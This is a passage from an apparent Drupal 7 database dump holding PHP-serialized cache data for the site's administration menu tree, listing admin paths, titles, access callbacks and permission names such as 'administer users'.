etc.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-8\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"21\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:15:\"admin/structure\";s:5:\"title\";s:9:\"Structure\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:45:\"Administer blocks, content types, menus, etc.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:22;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"22\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:11:\"admin/tasks\";s:11:\"router_path\";s:11:\"admin/tasks\";s:10:\"link_title\";s:5:\"Tasks\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-20\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"22\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:5:\"admin\";s:8:\"tab_root\";s:5:\"admin\";s:5:\"title\";s:5:\"Tasks\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"140\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}}}}s:10:\"node_links\";a:0:{}}',0,1423658967,1),('links:management:tree-data:en:ea01d543c33280063abb865e57ef92210bf7ec8b79022bcb5fd9bc5440f92d72','a:2:{s:4:\"tree\";a:1:{i:1;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:1:\"1\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:5:\"admin\";s:11:\"router_path\";s:5:\"admin\";s:10:\"link_title\";s:14:\"Administration\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"9\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:5:\"admin\";s:5:\"title\";s:14:\"Administration\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:1;}s:5:\"below\";a:11:{i:7;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:1:\"7\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:16:\"admin/appearance\";s:11:\"router_path\";s:16:\"admin/appearance\";s:10:\"link_title\";s:10:\"Appearance\";s:7:\"options\";s:83:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:33:\"Select and configure your themes.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-6\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"7\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"administer themes\";}\";s:13:\"page_callback\";s:18:\"system_themes_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:16:\"admin/appearance\";s:5:\"title\";s:10:\"Appearance\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:33:\"Select and configure your themes.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:8;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:1:\"8\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:12:\"admin/config\";s:11:\"router_path\";s:12:\"admin/config\";s:10:\"link_title\";s:13:\"Configuration\";s:7:\"options\";s:70:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:20:\"Administer settings.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"8\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:24:\"system_admin_config_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:12:\"admin/config\";s:5:\"title\";s:13:\"Configuration\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:20:\"Administer settings.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:9;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:1:\"9\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:13:\"admin/content\";s:11:\"router_path\";s:13:\"admin/content\";s:10:\"link_title\";s:7:\"Content\";s:7:\"options\";s:82:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:32:\"Administer content and comments.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-10\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"9\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:41:\"a:1:{i:0;s:23:\"access content overview\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:36:\"a:1:{i:0;s:18:\"node_admin_content\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:13:\"admin/content\";s:5:\"title\";s:7:\"Content\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:32:\"Administer content and comments.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:11;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"11\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:15:\"admin/dashboard\";s:11:\"router_path\";s:15:\"admin/dashboard\";s:10:\"link_title\";s:9:\"Dashboard\";s:7:\"options\";s:84:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:34:\"View and customize your dashboard.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-15\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"11\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:34:\"a:1:{i:0;s:16:\"access dashboard\";}\";s:13:\"page_callback\";s:15:\"dashboard_admin\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:15:\"admin/dashboard\";s:5:\"title\";s:9:\"Dashboard\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:34:\"View and customize your dashboard.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:12;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"12\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:10:\"admin/help\";s:11:\"router_path\";s:10:\"admin/help\";s:10:\"link_title\";s:4:\"Help\";s:7:\"options\";s:98:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:48:\"Reference for usage, configuration, and modules.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"9\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"12\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:9:\"help_main\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:10:\"admin/help\";s:5:\"title\";s:4:\"Help\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:48:\"Reference for usage, configuration, and modules.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:13;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"13\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:11:\"admin/index\";s:11:\"router_path\";s:11:\"admin/index\";s:10:\"link_title\";s:5:\"Index\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-18\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"13\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:18:\"system_admin_index\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:5:\"admin\";s:8:\"tab_root\";s:5:\"admin\";s:5:\"title\";s:5:\"Index\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"132\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:16;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"16\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:13:\"admin/modules\";s:11:\"router_path\";s:13:\"admin/modules\";s:10:\"link_title\";s:7:\"Modules\";s:7:\"options\";s:76:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:26:\"Extend site functionality.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-2\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"16\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:36:\"a:1:{i:0;s:18:\"administer modules\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:32:\"a:1:{i:0;s:14:\"system_modules\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:13:\"admin/modules\";s:5:\"title\";s:7:\"Modules\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:26:\"Extend site functionality.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:18;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"18\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:12:\"admin/people\";s:11:\"router_path\";s:12:\"admin/people\";s:10:\"link_title\";s:6:\"People\";s:7:\"options\";s:95:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:45:\"Manage user accounts, roles, and permissions.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-4\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"18\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:34:\"a:1:{i:0;s:16:\"administer users\";}\";s:13:\"page_callback\";s:10:\"user_admin\";s:14:\"page_arguments\";s:21:\"a:1:{i:0;s:4:\"list\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:12:\"admin/people\";s:5:\"title\";s:6:\"People\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:45:\"Manage user accounts, roles, and permissions.\";s:15:\"in_active_trail\";b:1;}s:5:\"below\";a:3:{i:29;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"29\";s:4:\"plid\";s:2:\"18\";s:9:\"link_path\";s:19:\"admin/people/create\";s:11:\"router_path\";s:19:\"admin/people/create\";s:10:\"link_title\";s:8:\"Add user\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"18\";s:2:\"p3\";s:2:\"29\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:34:\"a:1:{i:0;s:16:\"administer users\";}\";s:13:\"page_callback\";s:10:\"user_admin\";s:14:\"page_arguments\";s:23:\"a:1:{i:0;s:6:\"create\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:12:\"admin/people\";s:8:\"tab_root\";s:12:\"admin/people\";s:5:\"title\";s:8:\"Add user\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"388\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:45;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"45\";s:4:\"plid\";s:2:\"18\";s:9:\"link_path\";s:19:\"admin/people/people\";s:11:\"router_path\";s:19:\"admin/people/people\";s:10:\"link_title\";s:4:\"List\";s:7:\"options\";s:100:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:50:\"Find and manage people interacting with your site.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-10\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"18\";s:2:\"p3\";s:2:\"45\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:34:\"a:1:{i:0;s:16:\"administer users\";}\";s:13:\"page_callback\";s:10:\"user_admin\";s:14:\"page_arguments\";s:21:\"a:1:{i:0;s:4:\"list\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:12:\"admin/people\";s:8:\"tab_root\";s:12:\"admin/people\";s:5:\"title\";s:4:\"List\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"140\";s:11:\"description\";s:50:\"Find and manage people interacting with your site.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:49;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"49\";s:4:\"plid\";s:2:\"18\";s:9:\"link_path\";s:24:\"admin/people/permissions\";s:11:\"router_path\";s:24:\"admin/people/permissions\";s:10:\"link_title\";s:11:\"Permissions\";s:7:\"options\";s:114:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:64:\"Determine access to features by selecting permissions for roles.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"18\";s:2:\"p3\";s:2:\"49\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:40:\"a:1:{i:0;s:22:\"administer permissions\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:40:\"a:1:{i:0;s:22:\"user_admin_permissions\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:12:\"admin/people\";s:8:\"tab_root\";s:12:\"admin/people\";s:5:\"title\";s:11:\"Permissions\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"132\";s:11:\"description\";s:64:\"Determine access to features by selecting permissions for roles.\";s:15:\"in_active_trail\";b:1;}s:5:\"below\";a:2:{i:114;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"114\";s:4:\"plid\";s:2:\"49\";s:9:\"link_path\";s:29:\"admin/people/permissions/list\";s:11:\"router_path\";s:29:\"admin/people/permissions/list\";s:10:\"link_title\";s:11:\"Permissions\";s:7:\"options\";s:114:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:64:\"Determine access to features by selecting permissions for roles.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-8\";s:5:\"depth\";s:1:\"4\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"18\";s:2:\"p3\";s:2:\"49\";s:2:\"p4\";s:3:\"114\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:40:\"a:1:{i:0;s:22:\"administer permissions\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:40:\"a:1:{i:0;s:22:\"user_admin_permissions\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:24:\"admin/people/permissions\";s:8:\"tab_root\";s:12:\"admin/people\";s:5:\"title\";s:11:\"Permissions\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"140\";s:11:\"description\";s:64:\"Determine access to features by selecting permissions for roles.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:118;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"118\";s:4:\"plid\";s:2:\"49\";s:9:\"link_path\";s:30:\"admin/people/permissions/roles\";s:11:\"router_path\";s:30:\"admin/people/permissions/roles\";s:10:\"link_title\";s:5:\"Roles\";s:7:\"options\";s:80:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:30:\"List, edit, or add user 